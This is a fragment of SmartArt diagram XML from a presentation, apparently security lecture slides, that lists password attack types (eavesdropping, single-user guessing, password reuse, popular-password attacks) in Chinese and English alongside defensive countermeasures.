      <dgm:prSet presAssocID="{30456D73-8E82-A649-A740-1879C6D33282}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{848C61E5-409A-C740-AA68-ADE3DCC98201}" type="pres">
      <dgm:prSet presAssocID="{A5C196C3-A860-0B41-B060-04881B00345D}" presName="node" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{23775ADA-0C1F-2F40-8D01-761C261CD945}" type="pres">
      <dgm:prSet presAssocID="{67906169-6E9D-EF41-8FCD-35A1A08C6554}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FAF7C218-ACE7-E044-8C24-4F4BA3FE03B9}" type="pres">
      <dgm:prSet presAssocID="{F3AD6313-6439-4146-A5EA-D05864D8A339}" presName="node" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="4" custLinFactNeighborX="-430" custLinFactNeighborY="1057">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{957FE558-63CF-E342-B441-EAAB2413807B}" type="pres">
      <dgm:prSet presAssocID="{D690D0FC-C144-B741-9875-33646247EF6A}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{04157DF9-852F-4C4F-BF6C-512B987ED9D3}" type="pres">
      <dgm:prSet presAssocID="{9A83CF3E-EFC5-E74F-9B8E-A0DD4FC041EC}" presName="node" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{D5896C0E-F8C0-D442-BA99-FABB44919A3E}" type="presOf" srcId="{F3AD6313-6439-4146-A5EA-D05864D8A339}" destId="{FAF7C218-ACE7-E044-8C24-4F4BA3FE03B9}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#1"/>
    <dgm:cxn modelId="{CF271110-4455-45FA-AC0C-CA32D8E7B869}" type="presOf" srcId="{2DB8B588-CD56-4C4B-A240-590090493A4D}" destId="{0DE6613E-9542-DD4F-8586-39C0597E59D3}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#1"/>
    <dgm:cxn modelId="{95954B10-AC3E-47F3-A37B-13BD69C69AFE}" type="presOf" srcId="{A64F989D-2202-42BA-9968-6AE350774484}" destId="{04157DF9-852F-4C4F-BF6C-512B987ED9D3}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#1"/>
    <dgm:cxn modelId="{70DB7E11-FE12-4C05-88F2-F99A03F1EAD1}" type="presOf" srcId="{3C41424D-1F78-405E-9C3E-0A1027C987DE}" destId="{848C61E5-409A-C740-AA68-ADE3DCC98201}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#1"/>
    <dgm:cxn modelId="{EFBB1718-EAF5-7F41-990C-F5C21327B814}" type="presOf" srcId="{788CC790-2BD1-2A4C-896B-A17D6105902C}" destId="{0DE6613E-9542-DD4F-8586-39C0597E59D3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#1"/>
    <dgm:cxn modelId="{C474A222-2A09-48DD-8957-DD8C76B456B3}" srcId="{788CC790-2BD1-2A4C-896B-A17D6105902C}" destId="{C454DADE-95E0-458F-8459-CF287CD49F02}" srcOrd="1" destOrd="0" parTransId="{3B0C3AD2-C6DA-4AA5-8525-A5370389C765}" sibTransId="{ED9ECED9-E002-495D-91CA-A4443FD7AA4B}"/>
    <dgm:cxn modelId="{3E069829-3D72-B940-8A83-488D65A77CCA}" type="presOf" srcId="{613719F2-A867-0F4E-8754-FF62BC4BBBFA}" destId="{04157DF9-852F-4C4F-BF6C-512B987ED9D3}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#1"/>
    <dgm:cxn modelId="{91CEB934-47FD-034A-872C-1F58519CE160}" srcId="{263BACA8-498D-AC46-B74C-FB0755846CB6}" destId="{A5C196C3-A860-0B41-B060-04881B00345D}" srcOrd="1" destOrd="0" parTransId="{632BA074-B9D5-3A4A-B694-277D2045E3E4}" sibTransId="{67906169-6E9D-EF41-8FCD-35A1A08C6554}"/>
    <dgm:cxn modelId="{F9A1A65C-5530-B846-9B12-9ACFC0697EDF}" type="presOf" srcId="{A5C196C3-A860-0B41-B060-04881B00345D}" destId="{848C61E5-409A-C740-AA68-ADE3DCC98201}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#1"/>
    <dgm:cxn modelId="{B46FFA61-181E-49A9-896E-FC4FD7F8B447}" srcId="{788CC790-2BD1-2A4C-896B-A17D6105902C}" destId="{2DB8B588-CD56-4C4B-A240-590090493A4D}" srcOrd="0" destOrd="0" parTransId="{BC115E45-F553-469D-B8A8-95A4A79356EC}" sibTransId="{65DD7E64-3A37-43CC-9C01-603814AC635D}"/>
    <dgm:cxn modelId="{8D9FCA62-D9F2-F94B-ABF4-A523027558A6}" srcId="{F3AD6313-6439-4146-A5EA-D05864D8A339}" destId="{BA87DDE1-DBED-CC4A-B387-4D0AD6C44247}" srcOrd="0" destOrd="0" parTransId="{3AF69A9B-0362-8F40-8D0F-E32B95A572B2}" sibTransId="{745849C9-7904-7945-82E1-EF07F6E07592}"/>
    <dgm:cxn modelId="{69765667-CAAC-406B-B4BE-9A290E007DD7}" type="presOf" srcId="{C454DADE-95E0-458F-8459-CF287CD49F02}" destId="{0DE6613E-9542-DD4F-8586-39C0597E59D3}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#1"/>
    <dgm:cxn modelId="{E476F147-8F08-C748-8920-36FD5F2B12FF}" srcId="{263BACA8-498D-AC46-B74C-FB0755846CB6}" destId="{F3AD6313-6439-4146-A5EA-D05864D8A339}" srcOrd="2" destOrd="0" parTransId="{EFF36116-3A09-BD47-B4F9-9ABFA56D831E}" sibTransId="{D690D0FC-C144-B741-9875-33646247EF6A}"/>
    <dgm:cxn modelId="{94B8AD68-1E21-48A8-92A1-90D6166899A0}" srcId="{A5C196C3-A860-0B41-B060-04881B00345D}" destId="{3C41424D-1F78-405E-9C3E-0A1027C987DE}" srcOrd="1" destOrd="0" parTransId="{292F20FE-947B-4D6C-B9B8-52D82857D9E1}" sibTransId="{EF67F55B-3190-49E1-8EAD-1B8C9474FD97}"/>
    <dgm:cxn modelId="{C7A2424A-5BD6-FD4A-881B-BB048C81126B}" srcId="{9A83CF3E-EFC5-E74F-9B8E-A0DD4FC041EC}" destId="{613719F2-A867-0F4E-8754-FF62BC4BBBFA}" srcOrd="0" destOrd="0" parTransId="{51E6786C-964C-3B45-8027-F9047275062D}" sibTransId="{B0083B6C-2EA4-D14B-A640-C98F84884711}"/>
    <dgm:cxn modelId="{24101B6E-DFAA-455F-B249-B37D9E3F402E}" type="presOf" srcId="{D5BC5DFF-C524-4F13-91C6-E09242C906ED}" destId="{FAF7C218-ACE7-E044-8C24-4F4BA3FE03B9}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#1"/>
    <dgm:cxn modelId="{3506A476-91EE-4E76-8FA3-1E1DCAAA03F5}" srcId="{F3AD6313-6439-4146-A5EA-D05864D8A339}" destId="{D5BC5DFF-C524-4F13-91C6-E09242C906ED}" srcOrd="1" destOrd="0" parTransId="{4C6B5AC6-AF6B-4051-94B4-F4DB82C3D089}" sibTransId="{0A8F8689-79A1-4851-B91D-7BB711731F02}"/>
    <dgm:cxn modelId="{9A8AAB5A-41F3-8F4E-93EE-0105E303248E}" srcId="{263BACA8-498D-AC46-B74C-FB0755846CB6}" destId="{9A83CF3E-EFC5-E74F-9B8E-A0DD4FC041EC}" srcOrd="3" destOrd="0" parTransId="{C5841981-5DE5-7942-9014-330D5962DCBB}" sibTransId="{1ECD39FF-EC3A-9D42-99D6-4551E00B4F0B}"/>
    <dgm:cxn modelId="{9485E683-1DAC-1F46-84FD-00A46384CBE2}" type="presOf" srcId="{263BACA8-498D-AC46-B74C-FB0755846CB6}" destId="{95E667D7-5341-7440-8D3B-896369E0EDF9}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#1"/>
    <dgm:cxn modelId="{69AE8EA3-D9D2-3244-8783-7BEBF764225A}" srcId="{A5C196C3-A860-0B41-B060-04881B00345D}" destId="{7086B77F-B240-5648-A442-9D10D231775A}" srcOrd="0" destOrd="0" parTransId="{EF22FF3A-B406-8047-9ACD-ADEEB60599B6}" sibTransId="{3428C420-129B-1E43-9267-C454E90DF408}"/>
    <dgm:cxn modelId="{FD1ED7C4-94DA-764C-9470-0A0A0D0ED92E}" type="presOf" srcId="{9A83CF3E-EFC5-E74F-9B8E-A0DD4FC041EC}" destId="{04157DF9-852F-4C4F-BF6C-512B987ED9D3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#1"/>
    <dgm:cxn modelId="{7D6BF9C5-36BB-CA4E-92F4-0E4C37E104E7}" type="presOf" srcId="{7086B77F-B240-5648-A442-9D10D231775A}" destId="{848C61E5-409A-C740-AA68-ADE3DCC98201}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#1"/>
    <dgm:cxn modelId="{5E0BB7D0-2CE1-1346-9D55-892326D02C33}" srcId="{263BACA8-498D-AC46-B74C-FB0755846CB6}" destId="{788CC790-2BD1-2A4C-896B-A17D6105902C}" srcOrd="0" destOrd="0" parTransId="{6E5AE24B-A1A1-6045-9938-40E618929542}" sibTransId="{30456D73-8E82-A649-A740-1879C6D33282}"/>
    <dgm:cxn modelId="{19F8C6DB-5F29-8545-ACDA-59102BAA2C1C}" type="presOf" srcId="{BA87DDE1-DBED-CC4A-B387-4D0AD6C44247}" destId="{FAF7C218-ACE7-E044-8C24-4F4BA3FE03B9}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#1"/>
    <dgm:cxn modelId="{0A3E37DD-7D46-49F2-B85D-FCC80F637340}" srcId="{9A83CF3E-EFC5-E74F-9B8E-A0DD4FC041EC}" destId="{A64F989D-2202-42BA-9968-6AE350774484}" srcOrd="1" destOrd="0" parTransId="{74977FC0-6F00-4053-91F2-DFD78EF34B1D}" sibTransId="{E4E8F640-7415-4355-9FB8-2F496BB4619D}"/>
    <dgm:cxn modelId="{3C6F16EB-470F-BA4B-95DB-5D6DC2B817DD}" type="presParOf" srcId="{95E667D7-5341-7440-8D3B-896369E0EDF9}" destId="{0DE6613E-9542-DD4F-8586-39C0597E59D3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#1"/>
    <dgm:cxn modelId="{1413EE87-35CC-9B48-BC72-7F06BCFC919F}" type="presParOf" srcId="{95E667D7-5341-7440-8D3B-896369E0EDF9}" destId="{F10AEFC9-90B8-B941-B08D-E556BFDCB271}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#1"/>
    <dgm:cxn modelId="{B2189799-4813-3D44-BEFE-73FD6EB5B3F5}" type="presParOf" srcId="{95E667D7-5341-7440-8D3B-896369E0EDF9}" destId="{848C61E5-409A-C740-AA68-ADE3DCC98201}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#1"/>
    <dgm:cxn modelId="{656A4C68-BE8A-394D-A158-941E50DED8E6}" type="presParOf" srcId="{95E667D7-5341-7440-8D3B-896369E0EDF9}" destId="{23775ADA-0C1F-2F40-8D01-761C261CD945}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#1"/>
    <dgm:cxn modelId="{E2056232-C34F-B346-9AA4-02B2F9BB01BD}" type="presParOf" srcId="{95E667D7-5341-7440-8D3B-896369E0EDF9}" destId="{FAF7C218-ACE7-E044-8C24-4F4BA3FE03B9}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#1"/>
    <dgm:cxn modelId="{DD721549-1B25-AE4F-AFCC-F9CC7E10B2F2}" type="presParOf" srcId="{95E667D7-5341-7440-8D3B-896369E0EDF9}" destId="{957FE558-63CF-E342-B441-EAAB2413807B}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#1"/>
    <dgm:cxn modelId="{EBE76C47-D641-0840-B133-94E54761B2B6}" type="presParOf" srcId="{95E667D7-5341-7440-8D3B-896369E0EDF9}" destId="{04157DF9-852F-4C4F-BF6C-512B987ED9D3}" srcOrd="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4017A0-F5B3-F948-AAA8-C09873D8BB66}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/default#2" loCatId="list" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple4" qsCatId="simple" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/accent0_2" csCatId="mainScheme" phldr="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{92266341-BA3D-5146-A274-02455CA4BE89}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
            <a:t>电子监控</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" altLang="zh-CN" b="1"/>
        </a:p>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" b="1"/>
            <a:t>Electronic monitoring</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{342E21F8-DD57-5243-84A9-A8DF9107399D}" type="parTrans" cxnId="{C1C74E77-84E8-DE46-A1B9-94E2D4490474}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AC433C7E-FC2E-D244-BE69-511CA97997B7}" type="sibTrans" cxnId="{C1C74E77-84E8-DE46-A1B9-94E2D4490474}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C87A7D0B-7FD3-254E-8777-92F0D1A2469D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US"/>
            <a:t>如果通过网络传达密码以登录到远程系统，则会容易受到窃听</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B2274EC3-5634-5C4E-A56F-0E0DC53F5997}" type="parTrans" cxnId="{255042D5-D89B-A147-B928-0CDBCF0E6A51}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E1778334-ABAD-DD46-977B-25B6D432C67E}" type="sibTrans" cxnId="{255042D5-D89B-A147-B928-0CDBCF0E6A51}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1A18AAC5-35A0-F94C-8B7E-91890248F2F3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
            <a:t>针对单个用户的口令猜测</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" altLang="zh-CN" b="1"/>
        </a:p>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" b="1"/>
            <a:t>Password guessing against single user</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0EB46D98-34B0-D54F-9D58-FA8B6A952D55}" type="parTrans" cxnId="{A983B387-3A8D-2A4A-AE04-F3EDAA797D01}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E35B2FE7-84F5-424F-A387-DC365EF52297}" type="sibTrans" cxnId="{A983B387-3A8D-2A4A-AE04-F3EDAA797D01}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A6CA135C-FE19-4B41-8106-8AE3482E7388}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US"/>
            <a:t>攻击者会尝试获取有关帐户持有人和系统密码策略的知识，并使用该知识来猜测密码</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C77A8F1E-C16D-0F48-9516-FC5A0BA1D34F}" type="parTrans" cxnId="{038D9838-8C7C-4C49-A9DF-58A55A96CB70}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E990F7CB-167C-8C41-A774-11BB6D9B307B}" type="sibTrans" cxnId="{038D9838-8C7C-4C49-A9DF-58A55A96CB70}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{58AF6264-22D4-164E-A748-BF2D4994D8DF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
            <a:t>利用多个口令的使用</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" altLang="zh-CN" b="1"/>
        </a:p>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" b="1"/>
            <a:t>Exploiting multiple password use</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FF0A6A7A-7934-CF47-9B5B-E9D5D24AE0A6}" type="parTrans" cxnId="{176867B4-A15F-6644-B03E-5D8EEB93C627}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E12CAA20-FC13-FB4C-9FA2-299BF18B3F5E}" type="sibTrans" cxnId="{176867B4-A15F-6644-B03E-5D8EEB93C627}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FCE80896-82BA-A241-ACD0-2D7B289A2184}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US"/>
            <a:t>如果不同的网络设备为给定用户共享相同或相似的密码，攻击可能会变得更加有效或有害</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E9304B34-CF36-1F4D-BC42-151EEC8E3780}" type="parTrans" cxnId="{ABEFB8AD-81C2-E44E-B46A-201C9B99CB88}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{412A7C64-6513-364E-9E54-23FA6E31A462}" type="sibTrans" cxnId="{ABEFB8AD-81C2-E44E-B46A-201C9B99CB88}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{49D64987-2F1D-594F-A09B-BD9FE3E82FC7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
            <a:t>常用口令攻击</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" altLang="zh-CN" b="1"/>
        </a:p>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" b="1"/>
            <a:t>Popular password attack</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2F7669C2-4B8B-A544-A35F-48AEF442BB52}" type="parTrans" cxnId="{0236FE3F-5741-D84F-AEA7-1B2B9B8FBFD0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6FB9F64C-180B-6D4C-85F9-FD380D2C1C07}" type="sibTrans" cxnId="{0236FE3F-5741-D84F-AEA7-1B2B9B8FBFD0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EA65C092-68A8-6842-8BD8-3F31ACC1E4CD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US"/>
            <a:t>攻击是使用流行的密码，并针对广泛的用户</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN"/>
            <a:t>ID</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US"/>
            <a:t>进行尝试</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4F04BD0F-9757-2243-ACF6-8245501C5A45}" type="parTrans" cxnId="{CDC10D65-2B82-4040-82AB-143F618D61FD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F6006AF8-87C7-244B-B0BA-FA61AED8CD85}" type="sibTrans" cxnId="{CDC10D65-2B82-4040-82AB-143F618D61FD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{30494DBF-E200-472B-83C2-954E6834097B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US"/>
            <a:t>简单加密不会解决这个问题，因为加密密码实际上是密码，可以被对手观察和重用</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{00A5A8B9-FB3F-4025-8C83-40A45B53D763}" type="parTrans" cxnId="{61B5CABE-9700-4651-9447-1A4C8596C1F1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5C62E108-1FD0-426F-A144-43FCBA01598B}" type="sibTrans" cxnId="{61B5CABE-9700-4651-9447-1A4C8596C1F1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{35370B48-8489-45B0-93D8-EE158FAA3664}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US"/>
            <a:t>对策包括密码策略的培训和执行，使密码难以猜到</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E31BB95B-644E-4D1D-BB04-1C8F2B6DDAE8}" type="parTrans" cxnId="{D2453A2D-1A3E-4E73-B9B0-D853373146DB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4684B26D-C6DB-4C12-9A44-893B92EA04F4}" type="sibTrans" cxnId="{D2453A2D-1A3E-4E73-B9B0-D853373146DB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EEC901C7-890B-4C61-8696-FECA7C83BF2D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US"/>
            <a:t>对策包括在特定网络设备上禁止相同或相似的密码的策略</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DADCBE71-FDC0-4E72-B662-2F7DD6738618}" type="parTrans" cxnId="{7BDE1A3F-912B-4FED-A7E6-7B89DA0755B6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{21C9BA46-DCB0-4F99-8751-1281ACAA9277}" type="sibTrans" cxnId="{7BDE1A3F-912B-4FED-A7E6-7B89DA0755B6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{512F0F35-9CDF-4E1E-8882-D2CD0C0ACB7C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US"/>
            <a:t>对策包括禁止用户选择常用密码并扫描验证请求的</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN"/>
            <a:t>IP</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US"/>
            <a:t>地址以及提交模式的客户端</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN"/>
            <a:t>cookie</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US"/>
            <a:t>的策略</a:t>
